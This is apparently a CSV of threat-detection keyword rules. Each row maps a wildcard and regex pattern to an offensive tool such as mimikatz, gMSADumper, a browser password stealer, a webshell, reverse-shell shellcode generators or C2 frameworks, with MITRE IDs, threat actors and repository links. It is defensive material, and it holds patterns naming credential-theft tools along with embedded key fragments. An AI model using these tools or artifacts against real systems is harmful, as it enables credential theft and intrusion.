"*micahvandeusen/gMSADumper*",".{0,1000}micahvandeusen\/gMSADumper.{0,1000}","offensive_tool_keyword","gMSADumper","Lists who can read any gMSA password blobs and parses them if the current user has access.","T1552.001 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/micahvandeusen/gMSADumper","1","1","N/A","N/A","N/A","3","274","51","2024-02-12T02:15:32Z","2021-04-10T00:15:24Z","51945" "*Micedx765rosoft*",".{0,1000}Micedx765rosoft.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","51946" "*Michael Zhmaylo (github.com/*",".{0,1000}Michael\sZhmaylo\s\(github\.com\/.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","51947" "*mIcHyAmRaNe/wso-webshell*",".{0,1000}mIcHyAmRaNe\/wso\-webshell.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","1","N/A","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","51948" "*micr0 shell.py*",".{0,1000}micr0\sshell\.py.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - 
TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","1","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","51949" "*micr0_shell-main*",".{0,1000}micr0_shell\-main.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","1","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","51950" "*micr0shell.py *",".{0,1000}micr0shell\.py\s.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","1","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","51951" "*microbrownys.strangled.net*",".{0,1000}microbrownys\.strangled\.net.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","51952" "*MicroBurst.psm1*",".{0,1000}MicroBurst\.psm1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51953" 
"*MicroBurst-Az.psm1*",".{0,1000}MicroBurst\-Az\.psm1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51954" "*MicroBurst-AzureAD*",".{0,1000}MicroBurst\-AzureAD.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51955" "*MicroBurst-AzureREST*",".{0,1000}MicroBurst\-AzureREST.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51956" "*MicroBurst-AzureRM*",".{0,1000}MicroBurst\-AzureRM.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51957" "*MicroBurst-master*",".{0,1000}MicroBurst\-master.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation 
tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51958" "*MicroBurst-Misc.psm1*",".{0,1000}MicroBurst\-Misc\.psm1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51959" "*MicroBurst-MSOL*",".{0,1000}MicroBurst\-MSOL.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","51960" "*microchsse.strangled.net*",".{0,1000}microchsse\.strangled\.net.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","51961" "*microlilics.crabdance.com*",".{0,1000}microlilics\.crabdance\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","51962" 
"*micronaoko.jumpingcrab.com*",".{0,1000}micronaoko\.jumpingcrab\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","51963" "*microplants.strangled.net*",".{0,1000}microplants\.strangled\.net.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","51964" "*Microsoft\Windows\Recent\PrivescCheck*",".{0,1000}Microsoft\\Windows\\Recent\\PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","51971" "*microsoft-edge/cookies.txt*",".{0,1000}microsoft\-edge\/cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51972" 
"*microsoft-edge/credit_cards.txt*",".{0,1000}microsoft\-edge\/credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51973" "*microsoft-edge/history.txt*",".{0,1000}microsoft\-edge\/history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51974" "*microsoft-edge/login_data.txt*",".{0,1000}microsoft\-edge\/login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51975" "*microsoft-edge\cookies.txt*",".{0,1000}microsoft\-edge\\cookies\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential 
Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51976" "*microsoft-edge\credit_cards.txt*",".{0,1000}microsoft\-edge\\credit_cards\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51977" "*microsoft-edge\history.txt*",".{0,1000}microsoft\-edge\\history\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51978" "*microsoft-edge\login_data.txt*",".{0,1000}microsoft\-edge\\login_data\.txt.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","51979" "*microsploit.git*",".{0,1000}microsploit\.git.{0,1000}","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . 
Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","N/A","5","439","121","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z","51980" "*MIDL_INTERFACE(""A949CB4E-C4F9-44C4-B213-6BF8AA9AC69C"")*",".{0,1000}MIDL_INTERFACE\(\""A949CB4E\-C4F9\-44C4\-B213\-6BF8AA9AC69C\""\).{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#content","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","51981" "*Midl2Bytes.exe*",".{0,1000}Midl2Bytes\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","51982" "*--mifi-username * --mifi-password * --number +*",".{0,1000}\-\-mifi\-username\s.{0,1000}\s\-\-mifi\-password\s.{0,1000}\s\-\-number\s\+.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. 
Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","N/A","10","10","360","35","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z","51983" "*mifunftyundf6deg.azurewebsites.net*",".{0,1000}mifunftyundf6deg\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","51984" "*MIGkAgEBBDBido1KtKSwQah/WIoGkDZDX2WPXdexUVAmi0tf6Pd9vK5pfpt2II*",".{0,1000}MIGkAgEBBDBido1KtKSwQah\/WIoGkDZDX2WPXdexUVAmi0tf6Pd9vK5pfpt2II.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","51985" "*MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqKav9bmrSMSPwnxA3ul*",".{0,1000}MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqKav9bmrSMSPwnxA3ul.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","51986" "*MIIDBzCCAe+gAwIBAgIJAINGOZrDXvI2MA0GCSqGSIb3DQEBCwUAMCcxJTAjBgNV*",".{0,1000}MIIDBzCCAe\+gAwIBAgIJAINGOZrDXvI2MA0GCSqGSIb3DQEBCwUAMCcxJTAjBgNV.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","51987" "*MIIEoQIBAAKCAQEArJqP/6XFBa88x/DUootMmSzYa3MxcTV9FjNYUomqbQlGzuHa*",".{0,1000}MIIEoQIBAAKCAQEArJqP\/6XFBa88x\/DUootMmSzYa3MxcTV9FjNYUomqbQlGzuHa.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","51988" "*MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k*",".{0,1000}MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh\/hGmpPEzMr1v9fVYie4uFD33thh1k.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#base64","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","51989" "*MIIEowIBAAKCAQEAvZtOCbMyFKJN3n89nctTfYLSeiCTNG01rAFl06hMkobyzr0c*",".{0,1000}MIIEowIBAAKCAQEAvZtOCbMyFKJN3n89nctTfYLSeiCTNG01rAFl06hMkobyzr0c.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","51990" "*MIIEpAIBAAKCAQEAp4fWROz5dd1ylzYsMWYY6Y+EBfPjvieE7EniddfMkA7ss47F*",".{0,1000}MIIEpAIBAAKCAQEAp4fWROz5dd1ylzYsMWYY6Y\+EBfPjvieE7EniddfMkA7ss47F.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","#certificate","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","51991" "*MIIEpAIBAAKCAQEAqqKav9bmrSMSPwnxA3ulIleTPGiL9LGtdROute8ncU0HzPyL*",".{0,1000}MIIEpAIBAAKCAQEAqqKav9bmrSMSPwnxA3ulIleTPGiL9LGtdROute8ncU0HzPyL.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","51992" "*MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC9ZoKnCHwsOdxe*",".{0,1000}MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC9ZoKnCHwsOdxe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - 
T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","#base64","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","51994" "*MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCvmG0yhEe7dfN+*",".{0,1000}MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCvmG0yhEe7dfN\+.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","51995" "*MIIFFDCCAvwCCQDBhPvYPqGG4jANBgkqhkiG9w0BAQsFADBMMQswCQYDVQQGEwJH*",".{0,1000}MIIFFDCCAvwCCQDBhPvYPqGG4jANBgkqhkiG9w0BAQsFADBMMQswCQYDVQQGEwJH.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#certificate","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","51996" "*MIIJQQIBADANBgkqhkiG9w0BAQEFAASCCSswggknAgEAAoICAQDCRidsrTMB3NRW*",".{0,1000}MIIJQQIBADANBgkqhkiG9w0BAQEFAASCCSswggknAgEAAoICAQDCRidsrTMB3NRW.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#certificate","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","51998" "*Mikedillov1986@onionmail.org*",".{0,1000}Mikedillov1986\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51999" "*MikLYmAklY555@cock.li*",".{0,1000}MikLYmAklY555\@cock\.li.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52000" "*mimi32.exe *",".{0,1000}mimi32\.exe\s.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52001" "*mimi64.exe 
*",".{0,1000}mimi64\.exe\s.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","52002" "*Mimi-Command *",".{0,1000}Mimi\-Command\s.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","52003" "*Mimi-Command 
privilege::*",".{0,1000}Mimi\-Command\sprivilege\:\:.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","52004" "*mimidogz-master.zip*",".{0,1000}mimidogz\-master\.zip.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","52005" "*mimidrv (mimikatz)*",".{0,1000}mimidrv\s\(mimikatz\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - 